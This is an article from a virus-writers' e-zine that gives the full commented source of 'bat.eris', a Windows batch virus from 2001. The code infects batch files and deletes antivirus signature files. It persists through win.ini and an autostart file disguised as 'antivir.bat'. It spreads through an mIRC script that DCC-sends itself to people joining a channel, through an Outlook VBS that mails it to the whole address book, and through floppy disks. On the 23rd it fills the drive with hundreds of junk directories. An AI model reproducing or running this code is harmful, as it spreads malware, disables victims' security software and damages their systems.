<html>
<head>
<title>rRlf #2</title>
</head>
<body text="#ffffff" link="#58b3f6" vlink="#58b3f6" alink="#58b3f6" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>Infiltration of a Nation</i>
<br><table cellpadding="9">
<tr>
<th><a href="03.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="05.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>bat.eris by philet0ast3r</u></b>
<p>This is my 9th virus, and we have got end of January 2001 now.This one is a tribute to my religion
<br>(if you can call it so ;). A shout-out to all discordians on this planet and everywhere else.
<br>I have to say, that the payload is not my idea, I just made it a bit better and faster.
<br>The original is windy by Net_Tez. I didn't find him on the net, to ask him, if I could use and
<br>advance his old payload. He perhaps left the scene. Hey man, I would be pleased to hear from you ...
<br>Here are some facts:
<br>-parasitic bat-infector
<br>-searches the current, the parrent and the path directories
<br>-5 infections per run
<br>-Outlook worm: uses alcopaul's method to create a vbs that sends the batch-virus away
<br>&nbsp;subject: Hail Eris!
<br>&nbsp;body: Hail Discordia! All Hail Discordia! Welcome to c0nfusion.
<br>-mIRC worm
<br>-spreads via disks
<br>-autostart-secured win.ini-residency
<br>-retro: Norton AntiVirus 2000, AntiVir /9X Personal Edition, F-Prot 95, McAfee, Thunderbyte
<br>-payload: on every 23rd, a huge amount of directories gets created (exactly: 407),
<br>&nbsp;so if the victim wants to find something on his hd, he will unfortunately lose track of things
<br>&nbsp;and will have to delete all the created directories; there is some sort of message-payload:
<br>&nbsp;the file c:\3ri5\eris.inf gets created, which contains the following:
<br>&nbsp;Eris came to cause some confusion/chaos.
<br>&nbsp;Well done, my goddess!
<br>&nbsp;bat.eris by philet0ast3r [rRlf]
<br>&nbsp;(muse: windy by Net_Tez)
<br>-copies itself as call-back to the root-directory
<br>-signature: eris
<br>-fully compatible to Windows ME, Windows 98, Windows 95 (has been tested)
<br>-size: 23.000 bytes (I am very proud of this one ;)
<p>Well, here is the code ... with comments "::"
<br>These comments refer always to the code above and should be removed to "compile" virus.
<br>But for the lazy ones: It's not neccessary, but decreases size
<br>... and the victim does not know that easy what this batch is doing ;)
<br>Phile-name should be bat.eris.bat, but it's not neccessary.
<p>=====[begin code]===============================================================
<p>@echo off%_eris%
<br>if '%1=='eris goto eris%2
<br>set eris=%0.bat
<br>if not exist %eris% set eris=%0
<br>if '%eris%==' set eris=autoexec.bat
<br>if exist c:\_eris.bat goto erisg
<br>if not exist %eris% goto eeris
<br>find "eris"<%eris%>c:\_eris.bat
<br>attrib c:\_eris.bat +h
<br>:erisg
<br>command /e:5000 /c c:\_eris eris vir . .. %path%
<p>:: this is a quite normal infection-routine
<br>:: the hidden call-back-file is also created here
<p>:eeris
<br>ctty nul.eris
<br>if exist c:\_eris.bat del c:\programme\norton~1\s32integ.dll
<br>if exist c:\_eris.bat del c:\programme\f-prot95\fpwm32.dll
<br>if exist c:\_eris.bat del c:\programme\mcafee\scan.dat
<br>if exist c:\_eris.bat del c:\tbavw95\tbscan.sig
<br>if exist c:\_eris.bat del c:\programme\tbav\tbav.dat
<br>if exist c:\_eris.bat del c:\tbav\tbav.dat
<br>if exist c:\_eris.bat del c:\programme\avpersonal\antivir.vdf
<p>:: this is the retro-routine
<br>:: the avs can not scan without those files
<p>if exist c:\windows\startmen�\programme\autostart\antivir.bat goto rderis
<br>copy bat.eris.bat c:\windows\eris.sys
<br>echo @echo off>eris5.bat
<br>echo ctty nul>>eris5.bat
<br>echo if exist c:\windows\system\bat.eris.bat goto 0k>>eris5.bat
<br>echo copy c:\windows\eris.sys c:\windows\system\bat.eris.bat>>eris5.bat
<br>echo :0k>>eris5.bat
<br>move eris5.bat c:\windows\startmen�\programme\autostart\antivir.bat
<p>:: this is the autostart-secure-routine for the residency
<br>:: it checks if the win.ini-residency is still working
<p>:rderis
<br>if exist c:\windows\system\bat.eris.bat goto wyeris
<br>copy bat.eris.bat c:\windows\system
<br>copy bat.eris.bat + c:\windows\win.ini c:\windows\system\win.ini
<br>del c:\windows\win.ini
<br>move c:\windows\system\win.ini c:\windows
<br>goto wyeris
<p>[windows]
<br>load=c:\windows\system\bat.eris.bat
<br>run=C:\WINDOWS\SYSTEM\cmmpu.exe
<br>NullPort=None
<p>:wyeris
<p>:: this is the residency-routine, which infects the win.ini
<br>:: the empty lines are neccessary for windows taking this as true win.ini
<p>echo [script]>eris23.bat
<br>echo n0=on 1:JOIN:#:{ >>eris23.bat
<br>echo n1= /if ( nick == $me ) { halt } >>eris23.bat
<br>echo n2= /.dcc send $nick c:\windows\system\bat.eris.bat >>eris23.bat
<br>echo n3=} >>eris23.bat
<br>if exist c:\mirc\mirc.ini copy eris23.bat c:\mirc\script.ini
<br>if exist c:\mirc32\mirc.ini copy eris23.bat c:\mirc32\script.ini
<br>if exist c:\progra~1\mirc\mirc.ini copy eris23.bat c:\progra~1\mirc\script.ini
<br>if exist c:\progra~1\mirc32\mirc.ini copy eris23.bat c:\progra~1\mirc32\script.ini
<p>:: this is the mIRC-worm-routine
<br>:: it makes a mIRC-script-file and places it in a possible mIRC-directory
<p>:dieris
<br>if exist eris23.bat command /f /c copy c:\windows\system\bat.eris.bat a:\
<br>del eris23.bat
<p>:: the above is a command line, that makes it possible to copy to diskettes
<br>:: there will be no error if there is no disk in drive a: or if it is writeprotected or full
<p>:oleris
<br>echo.on error resume next >c:\windows\system\eris.vbs
<br>echo dim a,b,c,d,e >>c:\windows\system\eris.vbs
<br>echo set a = Wscript.CreateObject("Wscript.Shell") >>c:\windows\system\eris.vbs
<br>echo set b = CreateObject("Outlook.Application") >>c:\windows\system\eris.vbs
<br>echo set c = b.GetNameSpace("MAPI") >>c:\windows\system\eris.vbs
<br>echo for y = 1 To c.AddressLists.Count >>c:\windows\system\eris.vbs
<br>echo set d = c.AddressLists(y) >>c:\windows\system\eris.vbs
<br>echo x = 1 >>c:\windows\system\eris.vbs
<br>echo set e = b.CreateItem(0) >>c:\windows\system\eris.vbs
<br>echo for o = 1 To d.AddressEntries.Count >>c:\windows\system\eris.vbs
<br>echo f = d.AddressEntries(x) >>c:\windows\system\eris.vbs
<br>echo e.Recipients.Add f >>c:\windows\system\eris.vbs
<br>echo x = x + 1 >>c:\windows\system\eris.vbs
<br>echo next >>c:\windows\system\eris.vbs
<br>echo e.Subject = "Hail Eris!" >>c:\windows\system\eris.vbs
<br>echo e.Body = "Hail Discordia! All Hail Discordia! Welcome to c0nfusion." >>c:\windows\system\eris.vbs
<br>echo e.Attachments.Add ("c:\windows\system\bat.eris.bat") >>c:\windows\system\eris.vbs
<br>echo e.DeleteAfterSubmit = False >>c:\windows\system\eris.vbs
<br>echo e.Send >>c:\windows\system\eris.vbs
<br>echo f = "" >>c:\windows\system\eris.vbs
<br>echo next >>c:\windows\system\eris.vbs
<br>start c:\windows\system\eris.vbs
<p>:: this is the Outlook-worm-routine
<br>:: the created vbs sends the virus to the addresses in the address-book
<br>:: problem: when the vbs gets executed, and an (up to date) av-monitor is active,
<br>:: the system will probably halt, and the av will pop up a warning: "new vbs worm" or something like that
<p>:pleris
<br>echo.|date|find "23">nul.eris
<br>if errorlevel 1 goto naeris
<br>del nul.eris
<br>if exist c:\3ri5\eris.inf goto naeris
<br>md c:\3ri5>eris
<br>echo Eris came to cause some confusion/chaos.>eris.inf
<br>echo Well done, my goddess!>>eris.inf
<br>echo bat.eris by philet0ast3r [rRlf]>>eris.inf
<br>echo (muse: windy by Net_Tez)>>eris.inf
<br>move eris.inf c:\3ri5
<p>:: this is the "kind of" message-payload, that is written to the file c:\3ri5\eris.inf
<br>:: if this file already exists, the rest of the payload will not be carried out, to save some time
<br>:: of course, the payload only gets active, if we got a 23rd ;) you know what I mean ?!
<p>md c:\aa>eris
<br>md c:\bb>eris
<br>md c:\cc>eris
<br>md c:\ddn>eris
<br>md c:\eec>eris
<br>md c:\ffw>eris
<br>md c:\ggt>eris
<br>md c:\hhj>eris
<br>md c:\iii>eris
<br>md c:\jjfv>eris
<br>md c:\kkc>eris
<br>md c:\lle>eris
<br>md c:\mtm>eris
<br>md c:\nnb>eris
<br>md c:\oocv>eris
<br>md c:\pp>eris
<br>md c:\qq>eris
<br>md c:\rr>eris
<br>md c:\ss>eris
<br>md c:\tt>eris
<br>md c:\uud>eris
<br>md c:\vvr>eris
<br>md c:\wwj>eris
<br>md c:\xxv>eris
<br>md c:\yyf>eris
<br>md c:\zzh>eris
<br>md c:\bbdf>eris
<br>md c:\bbbf>eris
<br>md c:\ccdg>eris
<br>md c:\ddvn>eris
<br>md c:\eesc>eris
<br>md c:\ffwef>eris
<br>md c:\ggtr>eris
<br>md c:\hherj>eris
<br>md c:\iiier>eris
<br>md c:\jjferv>eris
<br>md c:\kkrec>eris
<br>md c:\llererwe>eris
<br>md c:\mwertm>eris
<br>md c:\nnwerb>eris
<br>md c:\oocwerv>eris
<br>md c:\ppere>eris
<br>md c:\qqrccr>eris
<br>md c:\rryr>eris
<br>md c:\ssfy>eris
<br>md c:\ttfv>eris
<br>md c:\uucdc>eris
<br>md c:\vvr>eris
<br>md c:\wwjc>eris
<br>md c:\xxvc>eris
<br>md c:\yyfc>eris
<br>md c:\zzhcc>eris
<br>md c:\bbef>eris
<br>md c:\brbbf>eris
<br>md c:\ccreg>eris
<br>md c:\eervn>eris
<br>md c:\reesc>eris
<br>md c:\ffwef>eris
<br>md c:\ggtr>eris
<br>md c:\hhekrj>eris
<br>md c:\iiiker>eris
<br>md c:\jjferkv>eris
<br>md c:\kkrekc>eris
<br>md c:\llekrerwe>eris
<br>md c:\mwertm>eris
<br>md c:\nnwterb>eris
<br>md c:\ooctwerv>eris
<br>md c:\pperre>eris
<br>md c:\qqreccr>eris
<br>md c:\rryrr>eris
<br>md c:\sserfy>eris
<br>md c:\ttrerefv>eris
<br>md c:\uuecec>eris
<br>md c:\vver>eris
<br>md c:\wwrjc>eris
<br>md c:\xxvc>eris
<br>md c:\yyrfc>eris
<br>md c:\zfzhcc>eris
<br>md c:\bbff>eris
<br>md c:\brbbf>eris
<br>md c:\ccrfg>eris
<br>md c:\ffrvn>eris
<br>md c:\rffsc>eris
<br>md c:\ffwff>eris
<br>md c:\ggtr>eris
<br>md c:\hhfkrj>eris
<br>md c:\iiikfr>eris
<br>md c:\jjffrkv>eris
<br>md c:\kkrfkc>eris
<br>md c:\llfkrfrwf>eris
<br>md c:\mwfrtm>eris
<br>md c:\nnwtfrb>eris
<br>md c:\ooctwfrv>eris
<br>md c:\ppfrrf>eris
<br>md c:\qqrfccr>eris
<br>md c:\rryrr>eris
<br>md c:\ssfrfy>eris
<br>md c:\ttrfrffv>eris
<br>md c:\uufcfc>eris
<br>md c:\vvfr>eris
<br>md c:\wwrjc>eris
<br>md c:\xxvc>eris
<br>md c:\yyrfc>eris
<br>md c:\zfzhcc>eris
<br>md c:\bbgg>eris
<br>md c:\brbbg>eris
<br>md c:\ccrgg>eris
<br>md c:\ggrvn>eris
<br>md c:\rggsc>eris
<br>md c:\ggwgg>eris
<br>md c:\ggtr>eris
<br>md c:\hhgkrj>eris
<br>md c:\jjggrkv>eris
<br>md c:\kkrgkc>eris
<br>md c:\llgkrgrwg>eris
<br>md c:\mwgrtm>eris
<br>md c:\nnwtgrb>eris
<br>md c:\ooctwgrv>eris
<br>md c:\ppgrrg>eris
<br>md c:\qqrgccr>eris
<br>md c:\ttrgrggv>eris
<br>md c:\uugcgc>eris
<br>md c:\vvgr>eris
<br>md c:\wwrjc>eris
<br>md c:\xxvc>eris
<br>md c:\yyrgc>eris
<br>md c:\zgzhcc>eris
<br>md c:\bbhh>eris
<br>md c:\brbbh>eris
<br>md c:\ccrhh>eris
<br>md c:\hhrvn>eris
<br>md c:\rhhsc>eris
<br>md c:\hhwhh>eris
<br>md c:\hhtr>eris
<br>md c:\hhhkrj>eris
<br>md c:\iiikhr>eris
<br>md c:\jjhhrkv>eris
<br>md c:\kkrhkc>eris
<br>md c:\llhkrhrwh>eris
<br>md c:\mwhrtm>eris
<br>md c:\nnwthrb>eris
<br>md c:\ooctwhrv>eris
<br>md c:\pphrrh>eris
<br>md c:\qqrhccr>eris
<br>md c:\rryrr>eris
<br>md c:\sshrhy>eris
<br>md c:\ttrhrhhv>eris
<br>md c:\uuhchc>eris
<br>md c:\vvhr>eris
<br>md c:\wwrjc>eris
<br>md c:\xxvc>eris
<br>md c:\yyrhc>eris
<br>md c:\zhzhcc>eris
<br>md c:\bbhh>eris
<br>md c:\brbbh>eris
<br>md c:\ccrhh>eris
<br>md c:\hhrvn>eris
<br>md c:\rhhsc>eris
<br>md c:\hhwhh>eris
<br>md c:\hhtr>eris
<br>md c:\hhhkrj>eris
<br>md c:\jjjkhr>eris
<br>md c:\jjhhrkv>eris
<br>md c:\kkrhkc>eris
<br>md c:\llhkrhrwh>eris
<br>md c:\mwhrtm>eris
<br>md c:\nnwthrb>eris
<br>md c:\ooctwhrv>eris
<br>md c:\pphrrh>eris
<br>md c:\qqrhccr>eris
<br>md c:\rryrr>eris
<br>md c:\sshrhy>eris
<br>md c:\ttrhrhhv>eris
<br>md c:\uuhchc>eris
<br>md c:\vvhr>eris
<br>md c:\wwrjc>eris
<br>md c:\xxvc>eris
<br>md c:\yyrhc>eris
<br>md c:\zhzhcc>eris
<br>md c:\bbaa>eris
<br>md c:\brbba>eris
<br>md c:\ccraa>eris
<br>md c:\aarvn>eris
<br>md c:\raasc>eris
<br>md c:\aawaa>eris
<br>md c:\aatr>eris
<br>md c:\aaaara>eris
<br>md c:\aaaaar>eris
<br>md c:\aaaarav>eris
<br>md c:\aaraac>eris
<br>md c:\llaararwa>eris
<br>md c:\mwartm>eris
<br>md c:\nnwtarb>eris
<br>md c:\ooctwarv>eris
<br>md c:\pparra>eris
<br>md c:\qqraccr>eris
<br>md c:\rryrr>eris
<br>md c:\ssaray>eris
<br>md c:\ttraraav>eris
<br>md c:\uuacac>eris
<br>md c:\vvar>eris
<br>md c:\wwrac>eris
<br>md c:\xxvc>eris
<br>md c:\yyrac>eris
<br>md c:\zazacc>eris
<br>md c:\bbaa>eris
<br>md c:\brbba>eris
<br>md c:\ccraa>eris
<br>md c:\aarvn>eris
<br>md c:\raasc>eris
<br>md c:\aawaa>eris
<br>md c:\aatr>eris
<br>md c:\aaaara>eris
<br>md c:\aaaaar>eris
<br>md c:\aaaarav>eris
<br>md c:\aaraac>eris
<br>md c:\llaararwa>eris
<br>md c:\mwartm>eris
<br>md c:\nnwtarb>eris
<br>md c:\ooctwarv>eris
<br>md c:\pparra>eris
<br>md c:\qqraccr>eris
<br>md c:\rryrr>eris
<br>md c:\ssaray>eris
<br>md c:\ttraraav>eris
<br>md c:\uuacac>eris
<br>md c:\vvar>eris
<br>md c:\wwrac>eris
<br>md c:\xxvc>eris
<br>md c:\yyrac>eris
<br>md c:\zazacc>eris
<br>md c:\bbshit>eris
<br>md c:\brbbc>eris
<br>md c:\shitrshit>eris
<br>md c:\shitrvn>eris
<br>md c:\rshitsc>eris
<br>md c:\shitwshit>eris
<br>md c:\shittr>eris
<br>md c:\shitshitrc>eris
<br>md c:\shitshitcr>eris
<br>md c:\shitshitrcv>eris
<br>md c:\shitrshitc>eris
<br>md c:\llshitrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\ooctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrshitcr>eris
<br>md c:\rryrr>eris
<br>md c:\sscrcy>eris
<br>md c:\ttrcrshitv>eris
<br>md c:\uushitshit>eris
<br>md c:\vvcr>eris
<br>md c:\wwrshit>eris
<br>md c:\xxvc>eris
<br>md c:\yyrshit>eris
<br>md c:\zczshitc>eris
<br>md c:\bbfuckhit>eris
<br>md c:\brbbc>eris
<br>md c:\fuckhitrfuckhit>eris
<br>md c:\fuckhitrvn>eris
<br>md c:\rfuckhitfuckc>eris
<br>md c:\fuckhitwfuckhit>eris
<br>md c:\fuckhittr>eris
<br>md c:\fuckhitfuckhitrc>eris
<br>md c:\fuckhitfuckhitcr>eris
<br>md c:\fuckhitfuckhitrcv>eris
<br>md c:\fuckhitrfuckhitc>eris
<br>md c:\llfuckhitrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\ooctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrfuckhitcr>eris
<br>md c:\rryrr>eris
<br>md c:\fuckfuckcrcy>eris
<br>md c:\ttrcrfuckhitv>eris
<br>md c:\uufuckhitfuckhit>eris
<br>md c:\vvcr>eris
<br>md c:\wwrfuckhit>eris
<br>md c:\xxvc>eris
<br>md c:\yyrfuckhit>eris
<br>md c:\zczfuckhitc>eris
<br>md c:\bbcunthit>eris
<br>md c:\brbbc>eris
<br>md c:\cunthitrcunthit>eris
<br>md c:\cunthitrvn>eris
<br>md c:\rcunthitcuntc>eris
<br>md c:\cunthitwcunthit>eris
<br>md c:\cunthittr>eris
<br>md c:\cunthitcunthitrc>eris
<br>md c:\cunthitcunthitcr>eris
<br>md c:\cunthitcunthitrcv>eris
<br>md c:\cunthitrcunthitc>eris
<br>md c:\llcunthitrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\ooctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrcunthitcr>eris
<br>md c:\rryrr>eris
<br>md c:\cuntcuntcrcy>eris
<br>md c:\ttrcrcunthitv>eris
<br>md c:\uucunthitcunthit>eris
<br>md c:\vvcr>eris
<br>md c:\wwrcunthit>eris
<br>md c:\xxvc>eris
<br>md c:\yyrcunthit>eris
<br>md c:\zczcunthitc>eris
<br>md c:\bbahit>eris
<br>md c:\brbbc>eris
<br>md c:\ahitrahit>eris
<br>md c:\ahitrvn>eris
<br>md c:\rahitac>eris
<br>md c:\ahitwahit>eris
<br>md c:\ahittr>eris
<br>md c:\ahitahitrc>eris
<br>md c:\ahitahitcr>eris
<br>md c:\ahitahitrcv>eris
<br>md c:\ahitrahitc>eris
<br>md c:\llahitrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\ooctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrahitcr>eris
<br>md c:\rryrr>eris
<br>md c:\aacrcy>eris
<br>md c:\ttrcrahitv>eris
<br>md c:\uuahitahit>eris
<br>md c:\vvcr>eris
<br>md c:\wwrahit>eris
<br>md c:\xxvc>eris
<br>md c:\yyrahit>eris
<br>md c:\zczahitc>eris
<br>md c:\bbdf>eris
<br>md c:\bbbf>eris
<br>md c:\ccdg>eris
<br>md c:\ddvn>eris
<br>md c:\eesc>eris
<br>md c:\ffwef>eris
<br>md c:\ggtr>eris
<br>md c:\hherj>eris
<br>md c:\iiier>eris
<br>md c:\jjferv>eris
<br>md c:\kkrec>eris
<br>md c:\llererwe>eris
<br>md c:\mwertm>eris
<br>md c:\nnwerb>eris
<br>md c:\oocwerv>eris
<br>md c:\ppere>eris
<br>md c:\qqrccr>eris
<br>md c:\rryr>eris
<br>md c:\ssfy>eris
<br>md c:\ttfv>eris
<br>md c:\uucdc>eris
<br>md c:\vvr>eris
<br>md c:\wwjc>eris
<br>md c:\xxvc>eris
<br>md c:\yyfc>eris
<br>md c:\zzhcc>eris
<br>md c:\bbef>eris
<br>md c:\brbbf>eris
<br>md c:\ccreg>eris
<br>md c:\eervn>eris
<br>md c:\reesc>eris
<br>md c:\ffwef>eris
<br>md c:\ggtr>eris
<br>md c:\hhekrj>eris
<br>md c:\iiiker>eris
<br>md c:\jjferkv>eris
<br>md c:\kkrekc>eris
<br>md c:\llekrerwe>eris
<br>md c:\mwertm>eris
<br>md c:\nnwterb>eris
<br>md c:\ooctwerv>eris
<br>md c:\pperre>eris
<br>md c:\qqreccr>eris
<br>md c:\rryrr>eris
<br>md c:\sserfy>eris
<br>md c:\ttrerefv>eris
<br>md c:\uuecec>eris
<br>md c:\vver>eris
<br>md c:\wwrjc>eris
<br>md c:\xxvc>eris
<br>md c:\yyrfc>eris
<br>md c:\zfzhcc>eris
<br>md c:\bbff>eris
<br>md c:\brbbf>eris
<br>md c:\ccrfg>eris
<br>md c:\ffrvn>eris
<br>md c:\rffsc>eris
<br>md c:\ffwff>eris
<br>md c:\ggtr>eris
<br>md c:\hhfkrj>eris
<br>md c:\iiikfr>eris
<br>md c:\jjffrkv>eris
<br>md c:\kkrfkc>eris
<br>md c:\llfkrfrwf>eris
<br>md c:\mwfrtm>eris
<br>md c:\nnwtfrb>eris
<br>md c:\ooctwfrv>eris
<br>md c:\ppfrrf>eris
<br>md c:\qqrfccr>eris
<br>md c:\rryrr>eris
<br>md c:\ssfrfy>eris
<br>md c:\ttrfrffv>eris
<br>md c:\uufcfc>eris
<br>md c:\vvfr>eris
<br>md c:\wwrjc>eris
<br>md c:\xxvc>eris
<br>md c:\yyrfc>eris
<br>md c:\zfzhcc>eris
<br>md c:\bbgg>eris
<br>md c:\brbbg>eris
<br>md c:\ccrgg>eris
<br>md c:\ggrvn>eris
<br>md c:\rggsc>eris
<br>md c:\ggwgg>eris
<br>md c:\ggtr>eris
<br>md c:\hhgkrj>eris
<br>md c:\iiikgr>eris
<br>md c:\jjggrkv>eris
<br>md c:\kkrgkc>eris
<br>md c:\llgkrgrwg>eris
<br>md c:\mwgrtm>eris
<br>md c:\nnwtgrb>eris
<br>md c:\ooctwgrv>eris
<br>md c:\ppgrrg>eris
<br>md c:\qqrgccr>eris
<br>md c:\rryrr>eris
<br>md c:\ssgrgy>eris
<br>md c:\ttrgrggv>eris
<br>md c:\uugcgc>eris
<br>md c:\vvgr>eris
<br>md c:\wwrjc>eris
<br>md c:\xxvc>eris
<br>md c:\yyrgc>eris
<br>md c:\zgzhcc>eris
<br>md c:\bbhh>eris
<br>md c:\brbbh>eris
<br>md c:\ccrhh>eris
<br>md c:\hhrvn>eris
<br>md c:\rhhsc>eris
<br>md c:\hhwhh>eris
<br>md c:\hhtr>eris
<br>md c:\hhhkrj>eris
<br>md c:\iiikhr>eris
<br>md c:\jjhhrkv>eris
<br>md c:\kkrhkc>eris
<br>md c:\llhkrhrwh>eris
<br>md c:\mwhrtm>eris
<br>md c:\nnwthrb>eris
<br>md c:\ooctwhrv>eris
<br>md c:\pphrrh>eris
<br>md c:\qqrhccr>eris
<br>md c:\rryrr>eris
<br>md c:\sshrhy>eris
<br>md c:\ttrhrhhv>eris
<br>md c:\uuhchc>eris
<br>md c:\vvhr>eris
<br>md c:\wwrjc>eris
<br>md c:\xxvc>eris
<br>md c:\yyrhc>eris
<br>md c:\zhzhcc>eris
<br>md c:\bbhh>eris
<br>md c:\brbbh>eris
<br>md c:\ccrhh>eris
<br>md c:\hhrvn>eris
<br>md c:\rhhsc>eris
<br>md c:\hhwhh>eris
<br>md c:\hhtr>eris
<br>md c:\hhhkrj>eris
<br>md c:\jjjkhr>eris
<br>md c:\jjhhrkv>eris
<br>md c:\kkrhkc>eris
<br>md c:\llhkrhrwh>eris
<br>md c:\mwhrtm>eris
<br>md c:\nnwthrb>eris
<br>md c:\ooctwhrv>eris
<br>md c:\pphrrh>eris
<br>md c:\qqrhccr>eris
<br>md c:\rryrr>eris
<br>md c:\sshrhy>eris
<br>md c:\ttrhrhhv>eris
<br>md c:\uuhchc>eris
<br>md c:\vvhr>eris
<br>md c:\wwrjc>eris
<br>md c:\xxvc>eris
<br>md c:\yyrhc>eris
<br>md c:\zhzhcc>eris
<br>md c:\bbcoffcoff>eris
<br>md c:\brbbcoff>eris
<br>md c:\ccrcoffcoff>eris
<br>md c:\coffcoffrvn>eris
<br>md c:\rcoffcoffsc>eris
<br>md c:\coffcoffoff>eris
<br>md c:\coffcofftr>eris
<br>md c:\coffcofrcoff>eris
<br>md c:\coffcoffcofoffr>eris
<br>md c:\coffcoffrcoffv>eris
<br>md c:\coffcoffrcoffcoffc>eris
<br>md c:\llcoffcoffrcoffrwcoff>eris
<br>md c:\mwcoffrtm>eris
<br>md c:\nnwtcoffrb>eris
<br>md c:\ooctwcoffrv>eris
<br>md c:\ppcoffrrcoff>eris
<br>md c:\qqrcoffccr>eris
<br>md c:\rryrr>eris
<br>md c:\sscoffrcoffy>eris
<br>md c:\ttrcoffrcofffv>eris
<br>md c:\uucoffccoffc>eris
<br>md c:\vvcoffr>eris
<br>md c:\wwrcoffc>eris
<br>md c:\xxvc>eris
<br>md c:\yyrcoffc>eris
<br>md c:\zcoffzcoffcc>eris
<br>md c:\bbcoffcoff>eris
<br>md c:\brbbcoff>eris
<br>md c:\ccrcoffcoff>eris
<br>md c:\coffcoffrvn>eris
<br>md c:\rcoffcoffsc>eris
<br>md c:\coffcoffwoff>eris
<br>md c:\coffcofftr>eris
<br>md c:\coffcoffcffrcoff>eris
<br>md c:\coffcoffcoffffr>eris
<br>md c:\coffcoffcoff>eris
<br>md c:\coffcoffrcoffcoffc>eris
<br>md c:\llcoffrwcoff>eris
<br>md c:\mwcoffrtm>eris
<br>md c:\nnwtcoffrb>eris
<br>md c:\ooctwcoffrv>eris
<br>md c:\ppcoffrrcoff>eris
<br>md c:\qqrcoffccr>eris
<br>md c:\rryrr>eris
<br>md c:\sscoffrcoffy>eris
<br>md c:\ttrcoffrcoffcoffv>eris
<br>md c:\uucoffccoffc>eris
<br>md c:\vvcoffr>eris
<br>md c:\wwrcoffc>eris
<br>md c:\xxvc>eris
<br>md c:\yyrcoffc>eris
<br>md c:\zcoffzcoffcc>eris
<br>md c:\bbk>eris
<br>md c:\brbbc>eris
<br>md c:\krk>eris
<br>md c:\krvn>eris
<br>md c:\rksc>eris
<br>md c:\kwk>eris
<br>md c:\ktr>eris
<br>md c:\kkrc>eris
<br>md c:\kkcr>eris
<br>md c:\kkrcv>eris
<br>md c:\krkc>eris
<br>md c:\llkrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\ooctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrkcr>eris
<br>md c:\rryrr>eris
<br>md c:\sscrcy>eris
<br>md c:\ttrcrkv>eris
<br>md c:\uukk>eris
<br>md c:\vvcr>eris
<br>md c:\wwrk>eris
<br>md c:\xxvc>eris
<br>md c:\yyrk>eris
<br>md c:\zczkc>eris
<br>md c:\bbchit>eris
<br>md c:\brbbc>eris
<br>md c:\chitrchit>eris
<br>md c:\chitrvn>eris
<br>md c:\rchitcc>eris
<br>md c:\chitwchit>eris
<br>md c:\chittr>eris
<br>md c:\chitchitrc>eris
<br>md c:\chitchitcr>eris
<br>md c:\chitchitrcv>eris
<br>md c:\chitrchitc>eris
<br>md c:\llchitrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\ooctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrchitcr>eris
<br>md c:\rryrr>eris
<br>md c:\cccrcy>eris
<br>md c:\ttrcrchitv>eris
<br>md c:\uuchitchit>eris
<br>md c:\vvcr>eris
<br>md c:\wwrchit>eris
<br>md c:\xxvc>eris
<br>md c:\yyrchit>eris
<br>md c:\zczchitc>eris
<br>md c:\bbihit>eris
<br>md c:\brbbc>eris
<br>md c:\ihitrihit>eris
<br>md c:\ihitrvn>eris
<br>md c:\rihitic>eris
<br>md c:\ihitwihit>eris
<br>md c:\ihittr>eris
<br>md c:\ihitihitrc>eris
<br>md c:\ihitihitcr>eris
<br>md c:\ihitihitrcv>eris
<br>md c:\ihitrihitc>eris
<br>md c:\llihitrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\ooctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrihitcr>eris
<br>md c:\rryrr>eris
<br>md c:\iicrcy>eris
<br>md c:\ttrcrihitv>eris
<br>md c:\uuihitihit>eris
<br>md c:\vvcr>eris
<br>md c:\wwrihit>eris
<br>md c:\xxvc>eris
<br>md c:\yyrihit>eris
<br>md c:\zczihitc>eris
<br>md c:\bbcoffhit>eris
<br>md c:\brbbc>eris
<br>md c:\coffhoffhit>eris
<br>md c:\coffhitrvn>eris
<br>md c:\rcoffhitcoffc>eris
<br>md c:\coffhitwcof>eris
<br>md c:\coffhittr>eris
<br>md c:\coffhofitrc>eris
<br>md c:\coffhicr>eris
<br>md c:\coffhitcoffrcv>eris
<br>md c:\coffhoffhitc>eris
<br>md c:\llcoffhitrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\ooctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrcoffhitcr>eris
<br>md c:\rryrr>eris
<br>md c:\coffcoffcrcy>eris
<br>md c:\ttrcrcoffhitv>eris
<br>md c:\uucoffhitcoffhit>eris
<br>md c:\vvcr>eris
<br>md c:\wwrcoffhit>eris
<br>md c:\xxvc>eris
<br>md c:\yyrcoffhit>eris
<br>md c:\zczcoffhitc>eris
<br>md c:\bbbb>eris
<br>md c:\brbbb>eris
<br>md c:\ccrbb>eris
<br>md c:\bbrvn>eris
<br>md c:\rbbsc>eris
<br>md c:\bbwbb>eris
<br>md c:\bbtr>eris
<br>md c:\bbbbrb>eris
<br>md c:\bbbbbr>eris
<br>md c:\bbbbrbv>eris
<br>md c:\bbrbbc>eris
<br>md c:\llbbrbrwb>eris
<br>md c:\mwbrtm>eris
<br>md c:\nnwtbrb>eris
<br>md c:\zzctwbrv>eris
<br>md c:\ppbrrb>eris
<br>md c:\qqrbccr>eris
<br>md c:\rryrr>eris
<br>md c:\ssbrby>eris
<br>md c:\ttrbrbbv>eris
<br>md c:\uubcbc>eris
<br>md c:\vvbr>eris
<br>md c:\wwrbc>eris
<br>md c:\hhvc>eris
<br>md c:\yyrbc>eris
<br>md c:\zbzbcc>eris
